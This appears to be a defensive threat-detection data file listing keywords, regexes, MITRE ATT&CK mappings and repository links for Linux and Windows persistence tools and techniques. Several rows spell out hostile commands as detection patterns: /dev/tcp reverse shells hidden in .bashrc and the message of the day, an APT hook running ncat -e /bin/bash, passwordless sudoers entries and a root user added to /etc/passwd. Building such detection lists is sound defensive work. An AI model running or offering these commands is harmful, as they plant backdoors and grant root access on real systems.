1043*demonizedshell.sh*.{0,1000}demonizedshell\.sh.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell11#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z40740
1044*demonizedshell_static.sh*.{0,1000}demonizedshell_static\.sh.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell11#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z40741
1045*devine@cr0.net*.{0,1000}devine\@cr0\.net.{0,1000}offensive_tool_keywordtshUNIX backdoorT1103 - T1105 - T1160 - T1189 - T1496 - T1102TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/creaktive/tsh10#email #linuxN/A1065681302024-02-20T18:07:08Z2011-05-14T19:15:00Z40779
1046*discovery_port_scan*.{0,1000}discovery_port_scan.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell10#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z41018
1047*dism /online /enable-feature /featurename:IIS-WebServerRole /all*.{0,1000}dism\s\s\/online\s\/enable\-feature\s\/featurename\:IIS\-WebServerRole\s\/all.{0,1000}greyware_tool_keywordpowershellenable the PowerShell Web Access featur which could be used for remote access and potentialT1548.002 - T1059.001TA0003N/AN/APersistencehttps://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf10N/Asigma pr https://github.com/SigmaHQ/sigma/pull/4997/files1010N/AN/AN/AN/A41049
1048*dism /online /enable-feature /featurename:WindowsPowerShellWebAccess /all*.{0,1000}dism\s\s\/online\s\/enable\-feature\s\/featurename\:WindowsPowerShellWebAccess\s\/all.{0,1000}greyware_tool_keywordpowershellenable the PowerShell Web Access featur which could be used for remote access and potentialT1548.002 - T1059.001TA0003N/AN/APersistencehttps://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf10N/Asigma pr https://github.com/SigmaHQ/sigma/pull/4997/files1010N/AN/AN/AN/A41050
1049*dism.exe*/enable-feature*WindowsPowerShellWebAccess *.{0,1000}dism\.exe.{0,1000}\/enable\-feature.{0,1000}WindowsPowerShellWebAccess\s.{0,1000}greyware_tool_keywordpowershellenable the PowerShell Web Access featur which could be used for remote access and potentialT1548.002 - T1059.001TA0003N/AN/APersistencehttps://www.cisa.gov/sites/default/files/2024-08/aa24-241a-iran-based-cyber-actors-enabling-ransomware-attacks-on-us-organizations_0.pdf10N/Asigma pr https://github.com/SigmaHQ/sigma/pull/4997/files1010N/AN/AN/AN/A41051
1050*Dive Shell - Emperor Hacking Team*.{0,1000}Dive\sShell\s\-\sEmperor\sHacking\sTeam.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z41081
1051*djhohnstein/SharpSC*.{0,1000}djhohnstein\/SharpSC.{0,1000}offensive_tool_keywordSharpSC.NET assembly to interact with services. (included in powershell empire)T1543.003TA0003N/AN/APersistencehttps://github.com/djhohnstein/SharpSC11N/AN/A814062019-09-27T23:04:24Z2019-09-24T21:05:38Z41086
1052*DoUCMe-main\*.{0,1000}DoUCMe\-main\\.{0,1000}offensive_tool_keyworddoucmeleverages the NetUserAdd Win32 API to create a new computer accountT1136 - T1098 - T1078TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Ben0xA/DoUCMe10N/AN/A9169182021-05-01T03:15:59Z2021-04-29T15:41:28Z41449
1053*DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd*.{0,1000}DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd.{0,1000}offensive_tool_keywordwso-webshellwso php webshellT1100 - T1027 - T1059TA0003 N/AEMBER BEAR - SandwormPersistencehttps://github.com/mIcHyAmRaNe/wso-webshell10#contentN/A1043762112024-07-08T04:54:36Z2017-05-04T23:34:02Z41551
1054*dropbearconvert openssh dropbear*.{0,1000}dropbearconvert\sopenssh\sdropbear.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10N/AN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z41569
1055*dropbearkey -t *.{0,1000}dropbearkey\s\-t\s.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10N/AN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z41570
1056*dropbearkey -y -f *.{0,1000}dropbearkey\s\-y\s\-f\s.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10N/AN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z41571
1057*drops a netcat?? undetectable by antivirus*.{0,1000}drops\sa\snetcat\?\?\sundetectable\sby\santivirus.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z41576
1058*dumpcreds*mimipenguin*.{0,1000}dumpcreds.{0,1000}mimipenguin.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell10#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z41662
1059*dynasty_rce/rce.php*.{0,1000}dynasty_rce\/rce\.php.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist11#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z41714
1060*DynastyPersist-main.zip*.{0,1000}DynastyPersist\-main\.zip.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist11#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z41715
1061*e01fee07234e35d11957d7ff65a5e2e7e0bac4a4ff061fd5b5d90a42701c1c49*.{0,1000}e01fee07234e35d11957d7ff65a5e2e7e0bac4a4ff061fd5b5d90a42701c1c49.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z41726
1062*e05ef2747f973d6ae9e4bd5fbeede55b27afd44882b83b4aee79330e856757e8*.{0,1000}e05ef2747f973d6ae9e4bd5fbeede55b27afd44882b83b4aee79330e856757e8.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z41746
1063*e0c9c27432a110f23a520ee1dad769a42f933062041df41cf88597fce97df008*.{0,1000}e0c9c27432a110f23a520ee1dad769a42f933062041df41cf88597fce97df008.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z41778
1064*e2c267e1e289e975e1a4a2acf13f30eb04dbb4a4da24daae02c248dbb199e919*.{0,1000}e2c267e1e289e975e1a4a2acf13f30eb04dbb4a4da24daae02c248dbb199e919.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z41923
1065*e2e3e51ea97a2c74d1b98618143d69acfcdbbabd0d33607cb475757e05fc6c4b*.{0,1000}e2e3e51ea97a2c74d1b98618143d69acfcdbbabd0d33607cb475757e05fc6c4b.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z41931
1066*e30443b3f19aafa06b3edb124228f6ac35aa51737c3eb78fa007ffdce9d75bc5*.{0,1000}e30443b3f19aafa06b3edb124228f6ac35aa51737c3eb78fa007ffdce9d75bc5.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z41946
1067*E3104B33-DB3D-4C83-B393-1E05E1FF2B10*.{0,1000}E3104B33\-DB3D\-4C83\-B393\-1E05E1FF2B10.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z41952
1068*e3b434dad7f4330a5402271014b6a450ecf998aa10d66c640798d5b1d057639a*.{0,1000}e3b434dad7f4330a5402271014b6a450ecf998aa10d66c640798d5b1d057639a.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z41996
1069*e3e2ced2569d1ebef8f65b554979747881e5e060355fa6698c913036dfd892ba*.{0,1000}e3e2ced2569d1ebef8f65b554979747881e5e060355fa6698c913036dfd892ba.{0,1000}offensive_tool_keywordSharpPersistSDA Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machinesT1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/cybersectroll/SharpPersistSD10#filehashN/A10187122024-05-15T14:55:14Z2024-05-13T15:11:12Z42007
1070*e443f79a4b00598ac5a5adc8826b605db24b6345ae1fb4180aa4f173152fffc0*.{0,1000}e443f79a4b00598ac5a5adc8826b605db24b6345ae1fb4180aa4f173152fffc0.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z42033
1071*e4f24bd9724afff4200cf4c57eeb2ba37b9bf99b7add53ce1262e2e98c80a812*.{0,1000}e4f24bd9724afff4200cf4c57eeb2ba37b9bf99b7add53ce1262e2e98c80a812.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z42076
1072*E55F7214-8CC4-4E1D-AEDB-C908D23902A4*.{0,1000}E55F7214\-8CC4\-4E1D\-AEDB\-C908D23902A4.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z42108
1073*E61C950E-A03D-40E2-AAD5-304C48570364*.{0,1000}E61C950E\-A03D\-40E2\-AAD5\-304C48570364.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72710#GUIDprojectN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z42153
1074*e75d251f639cc70aba21e621c2710dc3ee9dc15d1a677a157f83c14e9aff5f8e*.{0,1000}e75d251f639cc70aba21e621c2710dc3ee9dc15d1a677a157f83c14e9aff5f8e.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking10#filehashN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z42253
1075*e8eb686267d1017f0c044f8725a91d2a3b0111156975f4918c9b3839b571483f*.{0,1000}e8eb686267d1017f0c044f8725a91d2a3b0111156975f4918c9b3839b571483f.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z42374
1076*e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8*.{0,1000}e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10#filehashN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z42407
1077*E9F7C24C-879D-49F2-B9BF-2477DC28E2EE*.{0,1000}E9F7C24C\-879D\-49F2\-B9BF\-2477DC28E2EE.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10#GUIDprojectN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z42441
1078*eaa6c3fcb9e722d690183ae349ac2ca935aa9bcd2942f6f103fd8eb842dc5168*.{0,1000}eaa6c3fcb9e722d690183ae349ac2ca935aa9bcd2942f6f103fd8eb842dc5168.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z42501
1079*eaabe990e3dfa97bc3ffdd9f7369553597fb1686dbd91e164560ee476e1d6e79*.{0,1000}eaabe990e3dfa97bc3ffdd9f7369553597fb1686dbd91e164560ee476e1d6e79.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z42503
1080*eae7c7548d28517d099afef1bc7664f098bfa3c533ee5a0cf763ab28480ebeeb*.{0,1000}eae7c7548d28517d099afef1bc7664f098bfa3c533ee5a0cf763ab28480ebeeb.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z42513
1081*eb912ff679743d91907286544c7326df785a3a6e6992fa182404e3fbae52958a*.{0,1000}eb912ff679743d91907286544c7326df785a3a6e6992fa182404e3fbae52958a.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z42564
1082*ebab27736848eb90409384d231b939702ce97482cc231aba7d0acf58e02db438*.{0,1000}ebab27736848eb90409384d231b939702ce97482cc231aba7d0acf58e02db438.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z42575
1083*eca140e2de5725eeaa29ab48f86e1745ef0232aaafd04298eccb742e1241171b*.{0,1000}eca140e2de5725eeaa29ab48f86e1745ef0232aaafd04298eccb742e1241171b.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z42649
1084*ecfd0cd8274471f448e0ca1f0ee3d94affb9508c6c3cf8c72ade2e0fdd1b85b3*.{0,1000}ecfd0cd8274471f448e0ca1f0ee3d94affb9508c6c3cf8c72ade2e0fdd1b85b3.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z42678
1085*echo "@RFGroenewoud"*.{0,1000}echo\s\"\@RFGroenewoud\".{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z42686
1086*echo "Nothing to see here ... " > /var/log/kern.log*.{0,1000}echo\s\"Nothing\sto\ssee\shere\s\.\.\.\s\"\s\>\s\/var\/log\/kern\.log.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z42687
1087*echo * ALL=(ALL) NOPASSWD: ALL* >>/etc/sudoers*.{0,1000}echo\s.{0,1000}\sALL\=\(ALL\)\sNOPASSWD\:\sALL.{0,1000}\s\>\>\/etc\/sudoers.{0,1000}greyware_tool_keywordsudoersuse SUDO without passwordT1548.002 - T1059.004 - T1078.004TA0004 - TA0002 - TA0005N/AN/APersistenceN/A10#linuxN/A810N/AN/AN/AN/A42694
1088*echo * ALL=NOPASSWD: /bin/bash* >>/etc/sudoers*.{0,1000}echo\s.{0,1000}\sALL\=NOPASSWD\:\s\/bin\/bash.{0,1000}\s\>\>\/etc\/sudoers.{0,1000}greyware_tool_keywordsudoersuse SUDO without passwordT1548.002 - T1059.004 - T1078.004TA0004 - TA0002 - TA0005N/AN/APersistenceN/A10#linuxN/A810N/AN/AN/AN/A42695
1089*echo *%sudo ALL=(ALL) NOPASSWD: ALL* >> /etc/sudoers*.{0,1000}echo\s.{0,1000}\%sudo\s\sALL\=\(ALL\)\sNOPASSWD\:\sALL.{0,1000}\s\>\>\s\/etc\/sudoers.{0,1000}greyware_tool_keywordsudoSudo Persistence via sudoers fileT1078 - T1166TA0003N/AN/APersistencehttps://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md10#linuxN/A101015941982025-04-16T21:16:51Z2021-08-16T17:34:25Z42696
1090*echo *::0:0::/root:/bin/bash* >>/etc/passwd*.{0,1000}echo\s.{0,1000}\:\:0\:0\:\:\/root\:\/bin\/bash.{0,1000}\s\>\>\/etc\/passwd.{0,1000}greyware_tool_keywordbashadd a passwordless user T1136.001 - T1059.004 - T1078.004TA0005 - TA0002 - TA0004N/AN/APersistenceN/A10#linuxN/A88N/AN/AN/AN/A42698
1091*echo *APT::Update::Pre-Invoke *nohup ncat -lvp * -e /bin/bash * > /etc/apt/apt.conf.d/*.{0,1000}echo\s.{0,1000}APT\:\:Update\:\:Pre\-Invoke\s.{0,1000}nohup\sncat\s\-lvp\s.{0,1000}\s\-e\s\/bin\/bash\s.{0,1000}\s\>\s\/etc\/apt\/apt\.conf\.d\/.{0,1000}greyware_tool_keywordbashBackdooring APTT1059.004 - T1574.001 - T1027TA0002 - TA0005N/AN/APersistenceN/A10#linuxgreyware_tools high risks of false positivesN/AN/AN/AN/AN/AN/A42699
1092*echo *bash -c *bash -i >& /dev/tcp/*/* >> /etc/update-motd.d/00-header*.{0,1000}echo\s.{0,1000}bash\s\-c\s.{0,1000}bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\>\>\s\/etc\/update\-motd\.d\/00\-header.{0,1000}greyware_tool_keywordbashBackdooring Message of the DayT1059.004 - T1574.001 - T1027TA0002 - TA0005N/AN/APersistenceN/A10#linuxgreyware_tools high risks of false positivesN/AN/AN/AN/AN/AN/A42701
1093*echo > C:\inetpub\wwwroot\*\*.aspx*.{0,1000}echo\s\>\sC\:\\inetpub\\wwwroot\\.{0,1000}\\.{0,1000}\.aspx.{0,1000}greyware_tool_keywordechowriting an ASPX file to C:\inetpub\wwwroot\ (potential Web shell deployment)T1505.003TA0001 - TA0003N/AN/APersistenceN/A10N/AN/A1010N/AN/AN/AN/A42703
1094*echo 'alias cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* .{0,1000}echo\s\'alias\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\soffensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z42714
1095*echo 'find cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* .{0,1000}echo\s\'find\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\soffensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z42719
1096*edfc7e6329aeeb8cb0df8734ad9083840020e9d2d81d4ae71609dc7339552a0a*.{0,1000}edfc7e6329aeeb8cb0df8734ad9083840020e9d2d81d4ae71609dc7339552a0a.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z42817
1097*eec9b210d157d0ef16e7238c21bf66c6dd4806471853c3e976927f7be14ab918*.{0,1000}eec9b210d157d0ef16e7238c21bf66c6dd4806471853c3e976927f7be14ab918.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z42906
1098*ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63*.{0,1000}ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z42932
1099*ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63*.{0,1000}ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z42933
1100*EgeBalci/WSAAcceptBackdoor*.{0,1000}EgeBalci\/WSAAcceptBackdoor.{0,1000}offensive_tool_keywordWSAAcceptBackdoorWinsock accept() Backdoor ImplantT1574.001 - T1059 - T1213 - T1105 - T1546TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/EgeBalci/WSAAcceptBackdoor11N/AN/A102112232021-02-13T19:18:41Z2021-02-13T15:59:01Z43016
1101*Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All*.{0,1000}Enable\-WindowsOptionalFeature\s\-Online\s\-FeatureName\sMicrosoft\-Hyper\-V\s\-All.{0,1000}greyware_tool_keywordpowershellenabling hyperV - virtualization could be abused by attacker to maintain persistence in a virtual machineT1560.003 - T1547 - T1059TA0003 - TA0002N/ARagnarLocker Persistencehttps://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/10N/AN/A77N/AN/AN/AN/A43133
